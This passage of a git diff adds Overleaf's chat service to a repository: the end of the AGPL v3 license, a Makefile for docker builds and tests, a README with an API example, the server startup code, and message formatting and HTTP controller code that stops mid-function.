Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/services/chat/Makefile b/services/chat/Makefile new file mode 100644 index 0000000..94f0afb --- /dev/null +++ b/services/chat/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = chat +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/chat/README.md b/services/chat/README.md new file mode 100644 index 0000000..8bbc012 --- /dev/null +++ b/services/chat/README.md @@ -0,0 +1,11 @@ +overleaf/chat +=============== + +The backend API that powers the chat service in Overleaf + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. 
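+
+API sketch
+----------
+
+A minimal sketch of sending a global project message over HTTP. The
+`/project/:projectId/messages` route and port `3010` are assumptions (inferred
+from the controller names and the internal settings this service reads), not
+documented behaviour:
+
+    // hypothetical Node >= 18 client snippet (ESM, top-level await)
+    const projectId = '507f1f77bcf86cd799439011' // any valid ObjectId string
+    const res = await fetch(
+      `http://localhost:3010/project/${projectId}/messages`,
+      {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' },
+        // user_id must be a valid ObjectId; content is capped at 10 KB
+        body: JSON.stringify({
+          user_id: '507f1f77bcf86cd799439011',
+          content: 'Hello from the chat API',
+        }),
+      }
+    )
+    console.log(res.status) // expect 201 with the stored message as the body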
diff --git a/services/chat/app.js b/services/chat/app.js new file mode 100644 index 0000000..691b4ce --- /dev/null +++ b/services/chat/app.js @@ -0,0 +1,26 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import logger from '@overleaf/logger' +import settings from '@overleaf/settings' +import { mongoClient } from './app/js/mongodb.js' +import { createServer } from './app/js/server.js' + +const port = settings.internal.chat.port +const host = settings.internal.chat.host +mongoClient + .connect() + .then(async () => { + const { server } = await createServer() + server.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`Chat starting up, listening on ${host}:${port}`) + }) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) diff --git a/services/chat/app/js/Features/Messages/MessageFormatter.js b/services/chat/app/js/Features/Messages/MessageFormatter.js new file mode 100644 index 0000000..31e9300 --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageFormatter.js @@ -0,0 +1,60 @@ +export function formatMessageForClientSide(message) { + if (message._id) { + message.id = message._id.toString() + delete message._id + } + const formattedMessage = { + id: message.id, + content: message.content, + timestamp: message.timestamp, + user_id: message.user_id, + } + if (message.edited_at) { + formattedMessage.edited_at = message.edited_at + } + return formattedMessage +} + +export function formatMessagesForClientSide(messages) { + return messages.map(message => formatMessageForClientSide(message)) +} + +export function groupMessagesByThreads(rooms, messages) { + let room, thread + const roomsById = {} + for (room of rooms) { + roomsById[room._id.toString()] = room + } + + const threads = {} + const getThread = function (room) { + const threadId = room.thread_id.toString() + if (threads[threadId]) { + return threads[threadId] + } else { + const thread = { messages: [] } + if (room.resolved) { + thread.resolved = true + thread.resolved_at = room.resolved.ts + thread.resolved_by_user_id = room.resolved.user_id + } + threads[threadId] = thread + return thread + } + } + + for (const message of messages) { + room = roomsById[message.room_id.toString()] + if (room) { + thread = getThread(room) + thread.messages.push(formatMessageForClientSide(message)) + } + } + + for (const threadId in threads) { + thread = threads[threadId] + thread.messages.sort((a, b) => a.timestamp - b.timestamp) + } + + return threads +} diff --git a/services/chat/app/js/Features/Messages/MessageHttpController.js b/services/chat/app/js/Features/Messages/MessageHttpController.js new file mode 100644 index 0000000..45208e2 --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageHttpController.js @@ -0,0 +1,313 @@ +import logger from '@overleaf/logger' +import * as MessageManager from './MessageManager.js' +import * as MessageFormatter from './MessageFormatter.js' +import * as ThreadManager from '../Threads/ThreadManager.js' +import { ObjectId } from '../../mongodb.js' + +const DEFAULT_MESSAGE_LIMIT = 50 +const MAX_MESSAGE_LENGTH = 10 * 1024 // 10kb, about 1,500 words + +function readContext(context, req) { + req.body = context.requestBody + req.params = context.params.path + req.query = context.params.query + if (typeof req.params.projectId !== 'undefined') { + if 
(!ObjectId.isValid(req.params.projectId)) { + context.res.status(400).setBody('Invalid projectId') + } + } + if (typeof req.params.threadId !== 'undefined') { + if (!ObjectId.isValid(req.params.threadId)) { + context.res.status(400).setBody('Invalid threadId') + } + } +} + +/** + * @param context + * @param {(req: unknown, res: unknown) => Promise} ControllerMethod + * @returns {Promise<*>} + */ +export async function callMessageHttpController(context, ControllerMethod) { + const req = {} + readContext(context, req) + if (context.res.statusCode !== 400) { + return await ControllerMethod(req, context.res) + } else { + return context.res.body + } +} + +export async function getGlobalMessages(context) { + return await callMessageHttpController(context, _getGlobalMessages) +} + +export async function sendGlobalMessage(context) { + return await callMessageHttpController(context, _sendGlobalMessage) +} + +export async function sendMessage(context) { + return await callMessageHttpController(context, _sendThreadMessage) +} + +export async function getThreads(context) { + return await callMessageHttpController(context, _getAllThreads) +} + +export async function resolveThread(context) { + return await callMessageHttpController(context, _resolveThread) +} + +export async function reopenThread(context) { + return await callMessageHttpController(context, _reopenThread) +} + +export async function deleteThread(context) { + return await callMessageHttpController(context, _deleteThread) +} + +export async function editMessage(context) { + return await callMessageHttpController(context, _editMessage) +} + +export async function deleteMessage(context) { + return await callMessageHttpController(context, _deleteMessage) +} + +export async function deleteUserMessage(context) { + return await callMessageHttpController(context, _deleteUserMessage) +} + +export async function getResolvedThreadIds(context) { + return await callMessageHttpController(context, _getResolvedThreadIds) +} + +export async function destroyProject(context) { + return await callMessageHttpController(context, _destroyProject) +} + +export async function duplicateCommentThreads(context) { + return await callMessageHttpController(context, _duplicateCommentThreads) +} + +export async function generateThreadData(context) { + return await callMessageHttpController(context, _generateThreadData) +} + +export async function getStatus(context) { + const message = 'chat is alive' + context.res.status(200).setBody(message) + return message +} + +const _getGlobalMessages = async (req, res) => { + await _getMessages(ThreadManager.GLOBAL_THREAD, req, res) +} + +async function _sendGlobalMessage(req, res) { + const { user_id: userId, content } = req.body + const { projectId } = req.params + return await _sendMessage( + userId, + projectId, + content, + ThreadManager.GLOBAL_THREAD, + res + ) +} + +async function _sendThreadMessage(req, res) { + const { user_id: userId, content } = req.body + const { projectId, threadId } = req.params + return await _sendMessage(userId, projectId, content, threadId, res) +} + +const _getAllThreads = async (req, res) => { + const { projectId } = req.params + logger.debug({ projectId }, 'getting all threads') + const rooms = await ThreadManager.findAllThreadRooms(projectId) + const roomIds = rooms.map(r => r._id) + const messages = await MessageManager.findAllMessagesInRooms(roomIds) + const threads = MessageFormatter.groupMessagesByThreads(rooms, messages) + res.json(threads) +} + +const _generateThreadData = async (req, 
res) => { + const { projectId } = req.params + const { threads } = req.body + logger.debug({ projectId }, 'getting all threads') + const rooms = await ThreadManager.findThreadsById(projectId, threads) + const roomIds = rooms.map(r => r._id) + const messages = await MessageManager.findAllMessagesInRooms(roomIds) + logger.debug({ rooms, messages }, 'looked up messages in the rooms') + const threadData = MessageFormatter.groupMessagesByThreads(rooms, messages) + res.json(threadData) +} + +const _resolveThread = async (req, res) => { + const { projectId, threadId } = req.params + const { user_id: userId } = req.body + logger.debug({ userId, projectId, threadId }, 'marking thread as resolved') + await ThreadManager.resolveThread(projectId, threadId, userId) + res.status(204) +} + +const _reopenThread = async (req, res) => { + const { projectId, threadId } = req.params + logger.debug({ projectId, threadId }, 'reopening thread') + await ThreadManager.reopenThread(projectId, threadId) + res.status(204) +} + +const _deleteThread = async (req, res) => { + const { projectId, threadId } = req.params + logger.debug({ projectId, threadId }, 'deleting thread') + const roomId = await ThreadManager.deleteThread(projectId, threadId) + await MessageManager.deleteAllMessagesInRoom(roomId) + res.status(204) +} + +const _editMessage = async (req, res) => { + const { content, userId } = req.body + const { projectId, threadId, messageId } = req.params + logger.debug({ projectId, threadId, messageId, content }, 'editing message') + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + const found = await MessageManager.updateMessage( + room._id, + messageId, + userId, + content, + Date.now() + ) + if (!found) { + res.status(404) + return + } + res.status(204) +} + +const _deleteMessage = async (req, res) => { + const { projectId, threadId, messageId } = req.params + logger.debug({ projectId, threadId, messageId }, 'deleting message') + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + await MessageManager.deleteMessage(room._id, messageId) + res.status(204) +} + +const _deleteUserMessage = async (req, res) => { + const { projectId, threadId, userId, messageId } = req.params + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + await MessageManager.deleteUserMessage(userId, room._id, messageId) + res.status(204) +} + +const _getResolvedThreadIds = async (req, res) => { + const { projectId } = req.params + const resolvedThreadIds = await ThreadManager.getResolvedThreadIds(projectId) + res.json({ resolvedThreadIds }) +} + +const _destroyProject = async (req, res) => { + const { projectId } = req.params + logger.debug({ projectId }, 'destroying project') + const rooms = await ThreadManager.findAllThreadRoomsAndGlobalThread(projectId) + const roomIds = rooms.map(r => r._id) + logger.debug({ projectId, roomIds }, 'deleting all messages in rooms') + await MessageManager.deleteAllMessagesInRooms(roomIds) + logger.debug({ projectId }, 'deleting all threads in project') + await ThreadManager.deleteAllThreadsInProject(projectId) + res.status(204) +} + +async function _sendMessage(userId, projectId, content, clientThreadId, res) { + if (!ObjectId.isValid(userId)) { + const message = 'Invalid userId' + res.status(400).setBody(message) + return message + } + if (!content) { + const message = 'No content provided' + res.status(400).setBody(message) + return message + } + if (content.length > MAX_MESSAGE_LENGTH) { + const message = `Content too long (> 
${MAX_MESSAGE_LENGTH} bytes)` + res.status(400).setBody(message) + return message + } + logger.debug( + { clientThreadId, projectId, userId, content }, + 'new message received' + ) + const thread = await ThreadManager.findOrCreateThread( + projectId, + clientThreadId + ) + let message = await MessageManager.createMessage( + thread._id, + userId, + content, + Date.now() + ) + message = MessageFormatter.formatMessageForClientSide(message) + message.room_id = projectId + res.status(201).setBody(message) +} + +async function _getMessages(clientThreadId, req, res) { + let before, limit + const { projectId } = req.params + if (req.query.before) { + before = parseInt(req.query.before, 10) + } else { + before = null + } + if (req.query.limit) { + limit = parseInt(req.query.limit, 10) + } else { + limit = DEFAULT_MESSAGE_LIMIT + } + logger.debug( + { limit, before, projectId, clientThreadId }, + 'get message request received' + ) + const thread = await ThreadManager.findOrCreateThread( + projectId, + clientThreadId + ) + const threadObjectId = thread._id + logger.debug( + { limit, before, projectId, clientThreadId, threadObjectId }, + 'found or created thread' + ) + let messages = await MessageManager.getMessages(threadObjectId, limit, before) + 